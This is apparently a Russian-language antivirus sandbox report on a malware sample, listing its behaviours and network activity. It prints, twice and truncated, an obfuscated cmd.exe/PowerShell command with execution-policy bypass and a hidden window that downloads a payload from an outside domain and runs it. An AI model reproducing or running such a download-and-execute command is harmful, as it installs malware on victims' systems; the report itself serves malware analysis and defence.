Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c "p^Ow^E^RsHE^L^L.Ex^E^ -^eXe^C^UT^iO^nPOlIC^Y BYPas^s^ -nO^p^R^O^Fi^lE -windO^w^st^YLe ^hI^D^d^e^N (nEw-o^B^jec^T SYS^tEm^.Net.^W^e^bcLIEnT)^.^d^oW^nL^O^aD^fiLE^(^'http://www.zon...
Сетевая активность
Подключается к
- 'co##############e-chains.prod.autograph.services.mozaws.net':443
UDP
- DNS ASK mo#####.map.fastly.net
- DNS ASK co##############e-chains.prod.autograph.services.mozaws.net
- DNS ASK zo###opesa.top
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "p^Ow^E^RsHE^L^L.Ex^E^ -^eXe^C^UT^iO^nPOlIC^Y BYPas^s^ -nO^p^R^O^Fi^lE -windO^w^st^YLe ^hI^D^d^e^N (nEw-o^B^jec^T SYS^tEm^.Net.^W^e^bcLIEnT)^.^d^oW^nL^O^aD^fiLE^(^'http://www.zon... (со скрытым окном)
